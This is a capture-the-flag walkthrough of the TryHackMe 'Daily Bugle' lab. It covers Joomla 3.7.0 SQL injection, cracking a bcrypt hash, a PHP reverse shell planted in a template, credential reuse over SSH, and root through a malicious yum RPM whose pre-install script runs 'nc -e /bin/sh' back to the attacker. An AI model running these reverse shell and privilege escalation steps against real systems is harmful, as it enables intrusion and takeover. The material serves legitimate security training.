Today we are going to tackle the Daily Bungle on TryHackMe. I would say this is a pretty good beginner box. I got stuck for a while at the part where we put in our PHP code, because I didn’t know just hitting preview would give me a shell! All part of the learning process.
Let’s start off by using our favorite port scanner Nmap. I had to use the -Pn option to assume the host was up, because the host was blocking the initial ping scan. Nmap will assume that a host is dead if it doesn’t get an answer to a ping.
nmap -p- -T4 –reason -Pn IPAddress
Now that we know ports 22, 80, 3306 are open let’s do a service enumeration scan against them using Nmap.
nmap -p22,80,3306 -sV -T4 –reason IPAddress
When we visit the web server it tells us who robbed the bank, answering our first question.
Now we need to know what version of Joomla is running. You can look for certain files on the website that may disclose version information. First let’s right click on the page and select inspect element.
Now we can google how to enumerate the version of Joomla!. If you can find a language file it may contain the version information. We can also visit the README.txt file to try and enumerate the version. In this case both worked!
http://IPAddress/language/en-GB/en-GB.xml
Looks like we are running version 3.7. The answer wants the minor version as well, so we can guess that it’s 0, so the answer is 3.7.0.
Let’s search for exploits for Joomla! 3.7.0 on Google. I found a python exploit, so I will use that instead of Metasploit. The reason I don’t use Metasploit is to practice manually exploiting vulnerabilities. That way when I take my OSCP things are easier.
https://github.com/stefanlucas/Exploit-Joomla/blob/master/joomblah.py
Looking at the python code, we will be getting a CSRF token by visiting /index.php/component/users/?view=login. Then we perform SQL Injection in order to pull out a user hash. Let’s try the exploit and see what happens.
I saved the exploit code as JoomlaExploit.py, so to exploit it we will run
python JoomlaExploit.py http://IPAddress/
Honestly I am not sure how to determine which version of python to use, so I tried version 2 and 3. Turns out version 2 worked for the exploit. Great we have a super user with a hash! Now we just need to crack the hash to determine the password!
There’s a great tool build into Kali called hashid. It’s a python script and if you give it either -m (hashcat) or -j (JohnTheRipper) it will tell you the hash type and the mode to use to crack it! We can also combine the options to get both.
hashid -j -m ‘$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm’
Now we can attempt to crack the password!
First let’s put this hash into a file
echo ‘$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm’‘ > hash
If we want to use JohnTheRipper with default values run john hash
If we want to use hashcat run
hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt
I actually moved this onto my Windows machine to make it run faster. I have the rockyou.txt file in the same directory as hashcat. After about 5 minutes on my Windows laptop I cracked the password.
hashcat.exe -a 0 -m 3200 hash rockyou.txt
Now we can login as jonah into joomla.
Visit http://10.10.151.66/administrator
User: jonah
pass: spiderman123
Go to the drop down menu Extensions > Templates > click on Templates.
Click on Beez3 Details and Files.
Now click on the index.php file and it will show you all the code for that php file.
Now paste the reverse php shell at the bottom of the file. Be sure to replace $ip and $port with the netcat listener you will set up next. Now click on save.
Let’s set up the netcat listener by running nc -nlvp 1337
Finally you click on Template Preview and check your netcat for a shell!
Run whoami and you will see you are the www-data user. This means we need to privilege escalate. Since we don’t know the credentials to this account, we won’t be able to run sudo -l , to check for sudo commands we can run.
We still need to find the user flag, which www-data doesn’t have access to. looking through the directories there is a configuration find in /var/www/html.
cat /var/www/html/configuration.php
Looks like we not have credentials for the database, let’s try to login using them. First we need to upgrade our shell. Run which python and we see we have /usr/bin/python. Now create a tty shell by running
python -c ‘import pty; pty.spawn(“/bin/sh”)
We now have a full shell and can interact with SQL.
mysql -u root -p
Now enter in the password we found under public $password.
Now we have a prompt, let’s choose the database name of joomla, which we say above under public $db.
use joomla;
Now that we are using the databse run
show tables;
This will dump all the tables out, when we find an interesting one we can view the contents.
The fb9j5_users table could be interesting so let’s query the data for it.
select * from fb9j5_users;
This dumps out all the data and gives us a hash, but this is the same hash we grabbed earlier from the SQL injection exploit.
We could have skipped the whole section above interacting with the database, but never hurts to try something!
If we go into the home directory we see a user of jjameson. Maybe we can use the same credentials for the database as we can for this user.
ssh jjameson@IP
nv5uz9r3ZEDzVjNu
We are in as the user!
cat user.txt
Submit the flag.
Now we can try for a quick win by seeing if we can run any binaries as root.
sudo -l
Great we can run yum without a password as the root user! Let’s check https://gtfobin.io for privilege escalation. This site shows you many ways to escalate your privileges, among other things like downloading files and breaking out of restricted shells, based off different Linux binaries.
https://gtfobins.github.io/gtfobins/yum/
We can use method A, but we need the fpm package installed on our Linux environment, the attacker machine.
apt-get install ruby ruby-dev rubygems build-essential rpm -y
sudo gem install –no-document fpm
Once those are installed we can create our package for privilege escalation.
TF=$(mktemp -d)
echo ‘/usr/bin/nc -e “/bin/sh” IP PORT’ > $TF/x.sh
fpm -n x -s dir -t rpm -a all –before-install $TF/x.sh $TF
Now spin up a quick python server so we can download the file.
python3 -m http.server 1111
or
python2 -m SimpleHTTPServer 1111
Either one should work fine, I am using python3 for mine.
One the target machine move into the temp directory and download the file. We want to move into /tmp because we should be able to write there. Since we are the user, we could also write anywhere in /home/jjameson
cd /tmp
wget http://IPAddress:1111/x-1.0-1.noarch.rpm
Now we need to install this package using yum, which will escalate our privileges.
NOTE: If your package doesn’t work the first time, mine didn’t because I tried a different command you can remove it using sudo yum remove x-1.0-1.noarch
First let’s start a reverse listener on our attacker machine.
nc -nlvp 7777
Now on the target run
sudo /usr/bin/yum localinstall -y x-1.0-a.noarch.rpm
NOTE: If you don’t get your shell, you can try to reinstall the package after moving it.
To remove the package run
sudo rum remove x-1.0-1.noarch
It should get stuck at Running transaction, but if you check your listener you have a shell as root! We can quickly upgrade this to a better shell using python.
python -c ‘import pty; pty.spawn(“/bin/bash”)
Thanks for joining me for another journey through hacking! Hope you learned something.